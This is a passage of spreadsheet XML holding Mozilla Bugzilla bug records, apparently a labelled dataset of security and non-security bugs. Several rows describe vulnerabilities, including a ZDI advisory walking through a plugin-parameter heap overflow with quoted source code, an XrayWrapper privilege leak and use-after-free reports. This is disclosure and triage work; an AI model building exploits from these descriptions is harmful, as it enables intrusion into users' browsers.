          <t>normal</t>
        </is>
      </c>
      <c r="S959" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T959" t="n">
        <v>1</v>
      </c>
      <c r="U959" t="n">
        <v>0</v>
      </c>
      <c r="V959" t="n">
        <v>11</v>
      </c>
      <c r="W959" t="inlineStr">
        <is>
          <t>The x86 builds done here are not being signed:
http://ftp.mozilla.org/pub/mozilla.org/firefox/try-builds/bbondy@mozilla.com-f59703783c85/try-win32/
We would like to land bug 481815 tonight but I'm not sure if this is a common problem across all machines or just this one specific builder.</t>
        </is>
      </c>
      <c r="X959" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="960">
      <c r="A960" t="n">
        <v>930857</v>
      </c>
      <c r="B960" t="inlineStr">
        <is>
          <t>2013-10-24 22:00:49 -0700</t>
        </is>
      </c>
      <c r="C960" t="inlineStr">
        <is>
          <t>NewSessionTicket handshake message in a resumption handshake replaces cached session's ticket before handshake is finished</t>
        </is>
      </c>
      <c r="D960" t="inlineStr">
        <is>
          <t>2024-09-03 05:41:56 -0700</t>
        </is>
      </c>
      <c r="E960" t="n">
        <v>1</v>
      </c>
      <c r="F960" t="n">
        <v>1</v>
      </c>
      <c r="G960" t="n">
        <v>3</v>
      </c>
      <c r="H960" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I960" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J960" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K960" t="inlineStr">
        <is>
          <t>3.12</t>
        </is>
      </c>
      <c r="L960" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M960" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N960" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O960" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P960" t="inlineStr">
        <is>
          <t>[introduced in bug 403563][qa-][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q960" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R960" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S960" t="inlineStr">
        <is>
          <t>3.15.4</t>
        </is>
      </c>
      <c r="T960" t="n">
        <v>1</v>
      </c>
      <c r="U960" t="n">
        <v>0</v>
      </c>
      <c r="V960" t="n">
        <v>16</v>
      </c>
      <c r="W960" t="inlineStr">
        <is>
          <t>Created attachment 822123
fix-NewSessionTicket.patch
See http://tools.ietf.org/html/rfc5077#section-3.3:
"The client MUST NOT treat the ticket as valid until it has verified the server's Finished message."
This bug affects the case illustrated in figure 2 of RFC 5077, "Message Flow for Abbreviated Handshake Using New Session Ticket," where a NewSessionTicket message is sent during a session resumption, replacing the session ticket for a session already stored in the cache. That session may already be in use by other connections.
I am not sure if or how this bug could be exploited. However, I am not convinced it is unexploitable either, so I am hiding this bug for now. I suspect that, on its own, it is somewhat benign and may just result in DoS or poor performance. However, I think we should investigate further whether this could be used in conjunction with other attacks, either against us (the client) or against servers. Particularly, maybe incomplete verification of the ticket on the part of the server could result in CVE-2009-3555-like attacks when combined with this. Similarly, if there were some kind of session confusion issue on the client side, then this bug might make those issues worse.
* The session ticket is unusual in that it is an updatable part of a session, where most session data is not updatable. If we ever expose the session ticket to applications so that applications can associate the exact ticket used with a connection (actually a particular handshake on the connection), then would need to maintain an independent copy of the ticket data in ss-&gt;ssl3.hs at all times, instead of *moving* it from ss-&gt;ssl3.hs to the sid like this patch does.
* More alarmingly, there appear to be race conditions (TOCTOU, potentially use-after-free) to lack of locking around reads and updates of the session ticket within the sid. I am investigating this and will file another bug to fix that.</t>
        </is>
      </c>
      <c r="X960" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="961">
      <c r="A961" t="n">
        <v>1141241</v>
      </c>
      <c r="B961" t="inlineStr">
        <is>
          <t>2015-03-09 12:48:53 -0700</t>
        </is>
      </c>
      <c r="C961" t="inlineStr">
        <is>
          <t>crash in mozilla::MFTDecoder::SendMFTMessage(_MFT_MESSAGE_TYPE, unsigned long)</t>
        </is>
      </c>
      <c r="D961" t="inlineStr">
        <is>
          <t>2020-09-03 02:02:15 -0700</t>
        </is>
      </c>
      <c r="E961" t="n">
        <v>1</v>
      </c>
      <c r="F961" t="n">
        <v>1</v>
      </c>
      <c r="G961" t="n">
        <v>3</v>
      </c>
      <c r="H961" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I961" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J961" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K961" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L961" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M961" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N961" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O961" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P961" t="inlineStr"/>
      <c r="Q961" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R961" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S961" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T961" t="n">
        <v>1</v>
      </c>
      <c r="U961" t="n">
        <v>0</v>
      </c>
      <c r="V961" t="n">
        <v>19</v>
      </c>
      <c r="W961" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-dfe4cc80-eceb-437e-bae9-66a9f2150309.
=============================================================
Top frames:
0 	xul.dll 	mozilla::MFTDecoder::SendMFTMessage(_MFT_MESSAGE_TYPE, unsigned long) 	dom/media/fmp4/wmf/MFTDecoder.cpp
1 	xul.dll 	mozilla::WMFMediaDataDecoder::ProcessDrain() 	dom/media/fmp4/wmf/WMFMediaDataDecoder.cpp
2 	xul.dll 	nsRunnableMethodImpl&lt;void ( mozilla::crashreporter::LSPAnnotationGatherer::*)(void), void, 1&gt;::Run() 	xpcom/glue/nsThreadUtils.h
3 	xul.dll 	mozilla::MediaTaskQueue::Runner::Run() 	dom/media/MediaTaskQueue.cpp
[...]
This is the #9 crash in 37.0b3 when only looking at crashes with URLs containing "yahoo.com".
All of those seem to be EXCEPTION_ACCESS_VIOLATION_READ at address	0x2c and happening (probably as expected) on Win7 and higher only.</t>
        </is>
      </c>
      <c r="X961" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="962">
      <c r="A962" t="n">
        <v>768101</v>
      </c>
      <c r="B962" t="inlineStr">
        <is>
          <t>2012-06-25 11:03:04 -0700</t>
        </is>
      </c>
      <c r="C962" t="inlineStr">
        <is>
          <t>XrayWrapper pollution via unsafe COW</t>
        </is>
      </c>
      <c r="D962" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:49 -0700</t>
        </is>
      </c>
      <c r="E962" t="n">
        <v>1</v>
      </c>
      <c r="F962" t="n">
        <v>1</v>
      </c>
      <c r="G962" t="n">
        <v>3</v>
      </c>
      <c r="H962" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I962" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J962" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K962" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L962" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M962" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N962" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O962" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P962" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q962" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R962" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S962" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T962" t="n">
        <v>1</v>
      </c>
      <c r="U962" t="n">
        <v>0</v>
      </c>
      <c r="V962" t="n">
        <v>35</v>
      </c>
      <c r="W962" t="inlineStr">
        <is>
          <t>Created attachment 636392
Proof of concept
When InstallTrigger fails, it throws an error wrapped in a Chrome Object Wrapper. It doesn't specify |__exposedProps__|, so it's unsafe by default. An attacker may append custom-tailored |__exposedProps__| at the bottom of the error's prototype chain (in Object.prototype), thus exposing privileged functions of Object or Function. Function seems to be guarded well (it throws "Not allowed to access chrome eval or Function from content"), but Object has things like defineProperty or __defineGetter__, and they can be exploited to pollute the XrayWrapper of the content window.</t>
        </is>
      </c>
      <c r="X962" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="963">
      <c r="A963" t="n">
        <v>1258700</v>
      </c>
      <c r="B963" t="inlineStr">
        <is>
          <t>2016-03-22 07:06:54 -0700</t>
        </is>
      </c>
      <c r="C963" t="inlineStr">
        <is>
          <t>Replace wsgi-sslify with WhiteNoise 3.0's middleware-based approach &amp; use HSTS, Brotli compression</t>
        </is>
      </c>
      <c r="D963" t="inlineStr">
        <is>
          <t>2016-10-17 15:10:03 -0700</t>
        </is>
      </c>
      <c r="E963" t="n">
        <v>1</v>
      </c>
      <c r="F963" t="n">
        <v>1</v>
      </c>
      <c r="G963" t="n">
        <v>7</v>
      </c>
      <c r="H963" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I963" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J963" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K963" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L963" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M963" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N963" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O963" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P963" t="inlineStr"/>
      <c r="Q963" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R963" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S963" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T963" t="n">
        <v>1</v>
      </c>
      <c r="U963" t="n">
        <v>0</v>
      </c>
      <c r="V963" t="n">
        <v>7</v>
      </c>
      <c r="W963" t="inlineStr">
        <is>
          <t>WhiteNoise 3.0 now uses a Django middleware-based approach of integrating with Django, which means (a) simpler integration, (b) the ability to still use Django's security middleware [1] for things like HTTPS redirection, avoiding the need for yet another package (wsgi-sslify).
It also adds Brotli compression support, improved mimetype handling and more consistent behaviour between development and production environments:
http://whitenoise.evans.io/en/latest/changelog.html
David Evans asked if I could give it a spin before he produced the final release, and from my testing locally it works really well.
[1] https://docs.djangoproject.com/en/1.8/ref/middleware/#django.middleware.security.SecurityMiddleware</t>
        </is>
      </c>
      <c r="X963" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="964">
      <c r="A964" t="n">
        <v>572985</v>
      </c>
      <c r="B964" t="inlineStr">
        <is>
          <t>2010-06-18 00:27:14 -0700</t>
        </is>
      </c>
      <c r="C964" t="inlineStr">
        <is>
          <t>Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution Vulnerability (ZDI-CAN-821)</t>
        </is>
      </c>
      <c r="D964" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E964" t="n">
        <v>1</v>
      </c>
      <c r="F964" t="n">
        <v>1</v>
      </c>
      <c r="G964" t="n">
        <v>6</v>
      </c>
      <c r="H964" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I964" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J964" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K964" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L964" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M964" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N964" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O964" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P964" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q964" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R964" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S964" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T964" t="n">
        <v>1</v>
      </c>
      <c r="U964" t="n">
        <v>0</v>
      </c>
      <c r="V964" t="n">
        <v>31</v>
      </c>
      <c r="W964" t="inlineStr">
        <is>
          <t>Created attachment 452201
PoC
ZDI-CAN-821: Mozilla Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution Vulnerability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browser's method for parsing child
elements out of a particular tag. The application will use a 32-bit
index to enumerate them, but will store it in a 16-bit signed integer
and then use it to allocate space for a cache.  When populating the
cache a buffer overflow will occur. This can lead to code execution
under the context of the application.
The issue occurs within the application's support for parameters within
plugins. The application will create a cache for each parameter value
and name. This is done by enumerating the total number of parameters and
storing it. When calculating the size needed for the cache, the
application will store the total number of results into a signed
integer. This will cause the arithmetic required to undercalculate the
size for the allocation. Later when this cache is populated the buffer
overflow will occur.
After parsing the elements required for a plugin, the application will
enter the following code which will count the number of elements for the
cached Attribute/Param array.
layout/generic/nsObjectFrame.cpp:2873
nsresult nsPluginInstanceOwner::EnsureCachedAttrParamArrays()
{
  if (mCachedAttrParamValues)
    return NS_OK;
  NS_PRECONDITION(((mNumCachedAttrs + mNumCachedParams) == 0) &amp;&amp;
                  !mCachedAttrParamNames,
                  "re-cache of attrs/params not implemented! use the DOM
"
                  "node directy instead");
  NS_ENSURE_TRUE(mOwner, NS_ERROR_NULL_POINTER);
  // first, we need to find out how much we need to allocate for our
  // arrays count up attributes
  mNumCachedAttrs = 0;
  PRUint32 cattrs = mContent-&gt;GetAttrCount();
  if (cattrs &lt; 0x0000FFFF) {
    // unsigned 32 bits to unsigned 16 bits conversion
    mNumCachedAttrs = static_cast&lt;PRUint16&gt;(cattrs);
  } else {
    mNumCachedAttrs = 0xFFFE;  // minus one in case we add an extra
"src" entry below
  }
  // now, we need to find all the PARAM tags that are children of us
  // however, be carefull NOT to include any PARAMs that don't have us
  // as a direct parent. For nested object (or applet) tags, be sure
  // to only round up the param tags that coorespond with THIS
  // instance. And also, weed out any bogus tags that may get in the
  // way, see bug 39609. Then, with any param tag that meet our
  // qualification, temporarly cache them in an nsCOMArray until
  // we can figure out what size to make our fixed char* array.
  mNumCachedParams = 0;
After counting the number of elements, this will be assigned to a 16-bit
integer and then used in an allocation.
layout/generic/nsObjectFrame.cpp:2938
  if (allParams) {
    PRUint32 numAllParams; 
    allParams-&gt;GetLength(&amp;numAllParams);
    // loop through every so called dependent PARAM tag to check if it
    // "belongs" to us
    for (PRUint32 i = 0; i &lt; numAllParams; i++) {
      nsCOMPtr&lt;nsIDOMNode&gt; pnode;
      allParams-&gt;Item(i, getter_AddRefs(pnode));
      nsCOMPtr&lt;nsIDOMElement&gt; domelement = do_QueryInterface(pnode);
      if (domelement) {
...
            nsCOMPtr&lt;nsIDOMNode&gt; mydomNode =
do_QueryInterface(mydomElement);
            if (parent == mydomNode) {
              ourParams.AppendObject(domelement);
            }
          }
        }
      }
    }
  }
  // We're done with DOM method calls now; make sure we still have a
frame.
  NS_ENSURE_TRUE(mOwner, NS_ERROR_OUT_OF_MEMORY);
  PRUint32 cparams = ourParams.Count(); // unsigned 32 bits to unsigned
16 bits conversion
  if (cparams &lt; 0x0000FFFF)
    mNumCachedParams = static_cast&lt;PRUint16&gt;(cparams);
  else 
    mNumCachedParams = 0xFFFF;
...
  PRInt16 numRealAttrs = mNumCachedAttrs;           // XXX: implied type
conversion from unsigned to signed
  nsAutoString data;
  if (mContent-&gt;Tag() == nsGkAtoms::object
    &amp;&amp; !mContent-&gt;HasAttr(kNameSpaceID_None, nsGkAtoms::src)
    &amp;&amp; mContent-&gt;GetAttr(kNameSpaceID_None, nsGkAtoms::data, data)) {
      mNumCachedAttrs++;
  }
  // now lets make the arrays
  mCachedAttrParamNames  = (char **)PR_Calloc(sizeof(char *) *
(mNumCachedAttrs + 1 + mNumCachedParams), 1);            // XXX: signed
integer being used in an allocation
  NS_ENSURE_TRUE(mCachedAttrParamNames,  NS_ERROR_OUT_OF_MEMORY);
  mCachedAttrParamValues = (char **)PR_Calloc(sizeof(char *) *
(mNumCachedAttrs + 1 + mNumCachedParams), 1);            // XXX: signed
integer being used in an allocation
  NS_ENSURE_TRUE(mCachedAttrParamValues, NS_ERROR_OUT_OF_MEMORY);
The following code will then populate the allocated memory with the
cache. This will overflow the underallocated buffer that was provided.
layout/generic/nsObjectFrame.cpp:3038
  // Some plugins (eg Flash, see bug 234675.) are actually sensitive to
the
  // attribute order.  So we want to make sure we give the plugin the
  // attributes in the order they came in in the source, to be
compatible with
  // other browsers.  Now in HTML, the storage order is the reverse of
the
  // source order, while in XML and XHTML it's the same as the source
order
  // (see the AddAttributes functions in the HTML and XML content
sinks).
  PRInt16 start, end, increment;
  if (mContent-&gt;IsNodeOfType(nsINode::eHTML) &amp;&amp;
      mContent-&gt;NodeInfo()-&gt;NamespaceEquals(kNameSpaceID_None)) {
    // HTML.  Walk attributes in reverse order.
    start = numRealAttrs - 1;
    end = -1;
    increment = -1;
  } else {
    // XHTML or XML.  Walk attributes in forward order.
    start = 0;
    end = numRealAttrs;
    increment = 1;
  }
  for (PRInt16 index = start; index != end; index += increment) {
    const nsAttrName* attrName = mContent-&gt;GetAttrNameAt(index);
    nsIAtom* atom = attrName-&gt;LocalName();
    nsAutoString value;
    mContent-&gt;GetAttr(attrName-&gt;NamespaceID(), atom, value);
    nsAutoString name;
    atom-&gt;ToString(name);
    FixUpURLS(name, value);
    mCachedAttrParamNames [c] = ToNewUTF8String(name);
    mCachedAttrParamValues[c] = ToNewUTF8String(value);
    c++;
  }
Version(s)  tested: Mozilla Firefox 3.6.3
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * J23 (http://twitter.com/HansJ23)</t>
        </is>
      </c>
      <c r="X964" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="965">
      <c r="A965" t="n">
        <v>422301</v>
      </c>
      <c r="B965" t="inlineStr">
        <is>
          <t>2008-03-11 19:26:06 -0700</t>
        </is>
      </c>
      <c r="C965" t="inlineStr">
        <is>
          <t>Crash [@ nsOverflowContinuationTracker::Insert] with -moz-column, padding, margin</t>
        </is>
      </c>
      <c r="D965" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E965" t="n">
        <v>1</v>
      </c>
      <c r="F965" t="n">
        <v>1</v>
      </c>
      <c r="G965" t="n">
        <v>3</v>
      </c>
      <c r="H965" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I965" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J965" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K965" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L965" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M965" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N965" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O965" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P965" t="inlineStr">
        <is>
          <t>[sg:critical][fixed for 1.9.0 in bug 422283] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q965" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R965" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S965" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T965" t="n">
        <v>1</v>
      </c>
      <c r="U965" t="n">
        <v>0</v>
      </c>
      <c r="V965" t="n">
        <v>11</v>
      </c>
      <c r="W965" t="inlineStr">
        <is>
          <t>Created attachment 308786
testcase (crashes Firefox when loaded)
Loading the testcase makes Firefox crash with nsOverflowContinuationTracker::Insert calling 0xdddddddd.</t>
        </is>
      </c>
      <c r="X965" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="966">
      <c r="A966" t="n">
        <v>1467489</v>
      </c>
      <c r="B966" t="inlineStr">
        <is>
          <t>2018-06-07 08:28:15 -0700</t>
        </is>
      </c>
      <c r="C966" t="inlineStr">
        <is>
          <t>Convert lodash .some() to native ES6 JS</t>
        </is>
      </c>
      <c r="D966" t="inlineStr">
        <is>
          <t>2018-06-13 11:57:19 -0700</t>
        </is>
      </c>
      <c r="E966" t="n">
        <v>1</v>
      </c>
      <c r="F966" t="n">
        <v>1</v>
      </c>
      <c r="G966" t="n">
        <v>7</v>
      </c>
      <c r="H966" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I966" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J966" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K966" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L966" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M966" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N966" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O966" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P966" t="inlineStr"/>
      <c r="Q966" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R966" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S966" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T966" t="n">
        <v>1</v>
      </c>
      <c r="U966" t="n">
        <v>0</v>
      </c>
      <c r="V966" t="n">
        <v>5</v>
      </c>
      <c r="W966" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68
Steps to reproduce:
Converting all _.some() (lodash) functions to native .some() (ES6 JS)</t>
        </is>
      </c>
      <c r="X966" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="967">
      <c r="A967" t="n">
        <v>794158</v>
      </c>
      <c r="B967" t="inlineStr">
        <is>
          <t>2012-09-25 10:50:31 -0700</t>
        </is>
      </c>
      <c r="C967" t="inlineStr">
        <is>
          <t>Investigate if  AutoWrapperChanger causes security problems</t>
        </is>
      </c>
      <c r="D967" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:32 -0700</t>
        </is>
      </c>
      <c r="E967" t="n">
        <v>1</v>
      </c>
      <c r="F967" t="n">
        <v>1</v>
      </c>
      <c r="G967" t="n">
        <v>3</v>
      </c>
      <c r="H967" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I967" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J967" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K967" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L967" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M967" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N967" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O967" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P967" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q967" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R967" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S967" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T967" t="n">
        <v>1</v>
      </c>
      <c r="U967" t="n">
        <v>0</v>
      </c>
      <c r="V967" t="n">
        <v>39</v>
      </c>
      <c r="W967" t="inlineStr">
        <is>
          <t>AutoWrapperChanger is a class used on stack.
http://mxr.mozilla.org/mozilla-central/source/js/xpconnect/src/XPCWrappedNative.cpp?rev=ae68e6c539a2&amp;mark=1406-1441#1406
I keeps the wrapper on stack to prevent it to be GCed, but
if aCOMObj has pointers to also other JSObjects, I don't see what is keeping them alive, 
since AutoWrapperChanger's ctor calls  nsContentUtils::ReleaseWrapper which
ends up calling nsContentUtils::DropJSObjects.
AutoWrapperChanger is on stack quite long time so I believe GC can happen between
ctor and dtor.
(I hope someone proves this isn't a problem.)</t>
        </is>
      </c>
      <c r="X967" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="968">
      <c r="A968" t="n">
        <v>1143299</v>
      </c>
      <c r="B968" t="inlineStr">
        <is>
          <t>2015-03-14 06:25:37 -0700</t>
        </is>
      </c>
      <c r="C968" t="inlineStr">
        <is>
          <t>Heap-use-after-free in UnhookTextRunFromFrames</t>
        </is>
      </c>
      <c r="D968" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:32 -0800</t>
        </is>
      </c>
      <c r="E968" t="n">
        <v>1</v>
      </c>
      <c r="F968" t="n">
        <v>1</v>
      </c>
      <c r="G968" t="n">
        <v>3</v>
      </c>
      <c r="H968" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I968" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J968" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K968" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N968" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O968" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P968" t="inlineStr">
        <is>
          <t>[asan][adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q968" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R968" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S968" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T968" t="n">
        <v>1</v>
      </c>
      <c r="U968" t="n">
        <v>0</v>
      </c>
      <c r="V968" t="n">
        <v>23</v>
      </c>
      <c r="W968" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1141919 +++
Follow-up from bug 1141919 comment 36:
It happens here:
https://dxr.mozilla.org/mozilla-central/source/layout/base/nsCSSFrameConstructor.cpp#7916
The line:
&gt; InsertFrames(insertion.mParentFrame, kPrincipalList, prevSibling, frameItems);
tries to insert the newly constructed frames into the principal list while the prevSibling actually referes to a frame in the overflow list.</t>
        </is>
      </c>
      <c r="X968" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="969">
      <c r="A969" t="n">
        <v>785753</v>
      </c>
      <c r="B969" t="inlineStr">
        <is>
          <t>2012-08-26 15:09:06 -0700</t>
        </is>
      </c>
      <c r="C969" t="inlineStr">
        <is>
          <t>Global-buffer-overflow in nsCharTraits::length</t>
        </is>
      </c>
      <c r="D969" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:39 -0700</t>
        </is>
      </c>
      <c r="E969" t="n">
        <v>1</v>
      </c>
      <c r="F969" t="n">
        <v>1</v>
      </c>
      <c r="G969" t="n">
        <v>3</v>
      </c>
      <c r="H969" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I969" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J969" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K969" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L969" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M969" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N969" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O969" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P969" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q969" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R969" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S969" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T969" t="n">
        <v>1</v>
      </c>
      <c r="U969" t="n">
        <v>0</v>
      </c>
      <c r="V969" t="n">
